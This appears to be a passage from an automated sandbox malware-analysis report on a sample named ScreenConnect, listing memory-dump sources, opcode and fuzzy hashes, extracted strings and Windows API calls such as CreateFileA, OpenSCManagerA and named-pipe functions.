                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f581084be56c21199217a0eb4ebd9998410098f123fdc85b1f18fe8d55e50076
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84E09B35909294CFC7425B74641D4687FF3FF4711130940EFD846972A2DB364812CF85
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c00fbc98654977b62307a886af201a8160520da3dcce5e30bdfce9365f0c04f7
                                                                                                                                                                                                                                                        • Instruction ID: 9e4e3bf8fccd72f136c3057b16da490db73aa04b1cd5d011049ecbbed62746f2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00fbc98654977b62307a886af201a8160520da3dcce5e30bdfce9365f0c04f7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6E09A71905248DFCB00DBF0A9616A87BF5EF06200B10C1D9C949E7612EA365E02AB51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9cc4de1aef7b40b2585268cc3ff94655411ee75e97fbe99cf4512ca8af9697b6
                                                                                                                                                                                                                                                        • Instruction ID: 8a99376119d7dfc9b9c969256c53b67202cb633d3f562f5d43f85fda386f38f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cc4de1aef7b40b2585268cc3ff94655411ee75e97fbe99cf4512ca8af9697b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DE08632F014515B8B50915D9C446D5B7C98B8926473DC5B1F968CB341FA21DC014385
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f5aae047dd2aab276dbc12a958fa317e2580c9dd6e5d3d0bd9c53021031bf83f
                                                                                                                                                                                                                                                        • Instruction ID: 18d08d44ecda04d9f358a243979db4bf2102bd9d443024d4359ef1173ada9af6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5aae047dd2aab276dbc12a958fa317e2580c9dd6e5d3d0bd9c53021031bf83f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75E04FB1C051059FCF80DF7888661EEBFF0EB49114B1486EDC85DDB612F63256179B40
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9f82d92cd9f8fa5ca5eedb10243bd7d7bcde009661404aa982a354faa70c3eaf
                                                                                                                                                                                                                                                        • Instruction ID: 2ff475fb13847ed91f180dddee3c84a4dd123cae5fd57b875666c6757d82bc98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f82d92cd9f8fa5ca5eedb10243bd7d7bcde009661404aa982a354faa70c3eaf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAE0922210D7D24FC322A738A4913E97FE1AE871147498A9AD0C24B54AC6956D4B83A2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8fd498effdfe92560ec4e067e141d2e47780ea0572877e1f5de3c0a6b58f29c3
                                                                                                                                                                                                                                                        • Instruction ID: 5f0aae7be39f30987dcc0456a251d9e931116bdaf49846409d7d10c87b22dc9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fd498effdfe92560ec4e067e141d2e47780ea0572877e1f5de3c0a6b58f29c3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD01766A1E2D95FEB02127878A11FD7F64E98311570940E3D1D6CB063EA140A2B93AA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:10.2%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:311
                                                                                                                                                                                                                                                        Total number of Limit Nodes:34

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;#$k!
                                                                                                                                                                                                                                                        • API String ID: 0-1260452682
                                                                                                                                                                                                                                                        • Opcode ID: b7395f4d706bbe03abcc1f5549b30f1bbce75aa78644ffd5f8e637bba3bcd864
                                                                                                                                                                                                                                                        • Instruction ID: 3cebf667217d267822ccb9f49d6d9a6598a4f38a4f0dba5b139e4ffd0ee8057c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7395f4d706bbe03abcc1f5549b30f1bbce75aa78644ffd5f8e637bba3bcd864
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FB18C70A003059FEB15EF68D480A9EB7F2AF84704B55C969D80AEB350DF71FD4A8B91

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;#$k!
                                                                                                                                                                                                                                                        • API String ID: 0-1260452682
                                                                                                                                                                                                                                                        • Opcode ID: 5e3eb4ce7d3fba86c1f083bad6acd8d63b00df3149299ef4a6db1a1132da9f84
                                                                                                                                                                                                                                                        • Instruction ID: eca1d983f957b7f24b42fe7547e9a9e64b88a50cc3ab654a7634d2a6ed8510ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e3eb4ce7d3fba86c1f083bad6acd8d63b00df3149299ef4a6db1a1132da9f84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7A18D70A003019FEB15DF68D480A9EB7F2AF85704B55C969D80AEB314DF71FD4A8B92

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;#$k!
                                                                                                                                                                                                                                                        • API String ID: 0-1260452682
                                                                                                                                                                                                                                                        • Opcode ID: acfbd01af7aa0a6eaa321e0656faa2ef76c110d50b55575e575597b433f47c35
                                                                                                                                                                                                                                                        • Instruction ID: e52eb9efe147af555727a17168e2d7985b2d5f90c4056e99a65a1717a37a262e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acfbd01af7aa0a6eaa321e0656faa2ef76c110d50b55575e575597b433f47c35
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BEA18D70A003059FEB15EF68D480A9EB7F2AF84704B55C969D80AEB350DF71FD468B92

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: `q$nCq
                                                                                                                                                                                                                                                        • API String ID: 0-2487012879
                                                                                                                                                                                                                                                        • Opcode ID: b96d42adbfbeef6ed7a613b8b5563e33d3eb439f099ee96f0734fa37c86a21eb
                                                                                                                                                                                                                                                        • Instruction ID: 45bada14de0a3ddb1dc660c54ff7f34ec210bd1f400f8454820df46a564e4327
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b96d42adbfbeef6ed7a613b8b5563e33d3eb439f099ee96f0734fa37c86a21eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 354191307003068FE715EB38C59476E77E6AFC9601B168468D44ADB359EF70EC82CB91

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: t*Xt$t*Xt
                                                                                                                                                                                                                                                        • API String ID: 0-1672810414
                                                                                                                                                                                                                                                        • Opcode ID: 869ade23d4e37c2feb866adba805c9bbb2a164830e1a1d3d91ad5bd43fa4bc30
                                                                                                                                                                                                                                                        • Instruction ID: 605493d8a3e436b7f5957d925b0e37fe9360a8f9a5571bec3445ae2367eae12c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 869ade23d4e37c2feb866adba805c9bbb2a164830e1a1d3d91ad5bd43fa4bc30
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13118E71F00208AFEB24CE69C800AEBBBFAAFC5705F148866D159D7248E7719981CB90

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0574D7FD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: a9eaf8699dd8bccee73bb379ed73a50daa544bb12d1d164b7604d452cb48a4f0
                                                                                                                                                                                                                                                        • Instruction ID: 1046e8284cacfb44016d433334d1de42164c572d83a40f30e8b10925b38ea92e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9eaf8699dd8bccee73bb379ed73a50daa544bb12d1d164b7604d452cb48a4f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C518AB1D043489FDB21CFA9C884BDEBBF2FB48304F24816AD848AB252D7759845CF91

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • OpenSCManagerA.SECHOST(?,?,?), ref: 057216AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816946745.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5720000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                                                                                                                                        • Opcode ID: 8c67df7fb2a0e2f7cb057a559e6a79fa78cbf970b2ca6e8e89f6b84d5d09002b
                                                                                                                                                                                                                                                        • Instruction ID: 142c8a4de8c0592a7329f48aeec563aa9d39872bee7042136227201e3c3a0437
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c67df7fb2a0e2f7cb057a559e6a79fa78cbf970b2ca6e8e89f6b84d5d09002b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1517A71D003699FDB14CFA9C8857AEBBF1FB48310F688129E816AB340DB749885DB81

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • OpenSCManagerA.SECHOST(?,?,?), ref: 057216AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816946745.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5720000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                                                                                                                                        • Opcode ID: 675c48e454fe788e90def1248766ce9625ca575bcb72a0873d1ef0339dd8f66e
                                                                                                                                                                                                                                                        • Instruction ID: cb69e7de9e34096e3a95ffa2cdde7c7639bd112d73dd600c6357622ee3497997
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 675c48e454fe788e90def1248766ce9625ca575bcb72a0873d1ef0339dd8f66e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4513871D007699FDB14CFA9C8857ADBBB1FB48310F648129E815A7340DB749885DB81

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0574D7FD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: f17d6db5d0a29c3e3c7c80e05d09517d74f9ceb58d5fdd51fa217a766db11c78
                                                                                                                                                                                                                                                        • Instruction ID: 1c073ec2783be4602c01de3ee2fc737df0549d87536bfe1361bd42ecc5bbb784
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f17d6db5d0a29c3e3c7c80e05d09517d74f9ceb58d5fdd51fa217a766db11c78
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 495135B1D003499FDB21CFA9C984B9EBBF2FB48304F248129E858AB355D7B59845CF91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0574D7FD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 255864e6de1d827af5fd7b58379e28e8a623c45c1848bab541edd342970d0b21
                                                                                                                                                                                                                                                        • Instruction ID: 46eb08edaed90e69e602bddc6ac479217e1d9e98ba13eda8a4c8989161bdfddb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 255864e6de1d827af5fd7b58379e28e8a623c45c1848bab541edd342970d0b21
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 745156B1D003499FDB20CFA9C944B9EBBF2FB48304F248029E858AB351D7B59845CF91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05743CC8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: 11451d078ee67277a6ba07ec2b7f4f4ebc2a839a3c1ef297bd3994ea82615c9e
                                                                                                                                                                                                                                                        • Instruction ID: dda75974fb40b0ea7112efc3db793a516c83b2cae5126c9cc6dc89ff34d0cc5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11451d078ee67277a6ba07ec2b7f4f4ebc2a839a3c1ef297bd3994ea82615c9e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 382126B5D002189FDB24CFA9D584BDEBBF1BF08300F24841AE819A7350CB74A846CFA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05743CC8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000), ref: 05741EDF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000), ref: 05741EDF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: [$z
                                                                                                                                                                                                                                                        • API String ID: 0-177125795
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: [$z
                                                                                                                                                                                                                                                        • API String ID: 0-177125795
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCq
                                                                                                                                                                                                                                                        • API String ID: 0-2853737484
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCq
                                                                                                                                                                                                                                                        • API String ID: 0-2853737484
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: t*Xt
                                                                                                                                                                                                                                                        • API String ID: 0-3586738584
                                                                                                                                                                                                                                                        • Opcode ID: 9856df9d1b689f4382f5785042e2bc9bc8cb63ac6d92971a4b97ce1bdb3253aa
                                                                                                                                                                                                                                                        • Instruction ID: 20102c9ecc67c2996c0d524e579a81ee2cb37e86cabe8fdea5646e26a16d942c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9856df9d1b689f4382f5785042e2bc9bc8cb63ac6d92971a4b97ce1bdb3253aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53112171E00208AFEB25CF68D800AEBBBB6EF80315B148966D118D7149D3728A82CB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 07740d4e950863943c1cccbe4e01463092c30a35771f8c6b069a2e72610cbafc
                                                                                                                                                                                                                                                        • Instruction ID: 3e3253833231d938e12909b2633407c0460e9d9643b8baa3d260e3a70fb2c27b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07740d4e950863943c1cccbe4e01463092c30a35771f8c6b069a2e72610cbafc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68B1C430A40349DFDB05DFA8C494AADBBB1FF85300F108599D44AAB366DF74E986CB81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 126e74c7fd0960174350b0687012e68621e41725ab34baaca85604e2aaec0843
                                                                                                                                                                                                                                                        • Instruction ID: 8d5f50c6e6ee7139bdb2736656c8bb591e552703acfece6953ac1247a1f0a8b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 126e74c7fd0960174350b0687012e68621e41725ab34baaca85604e2aaec0843
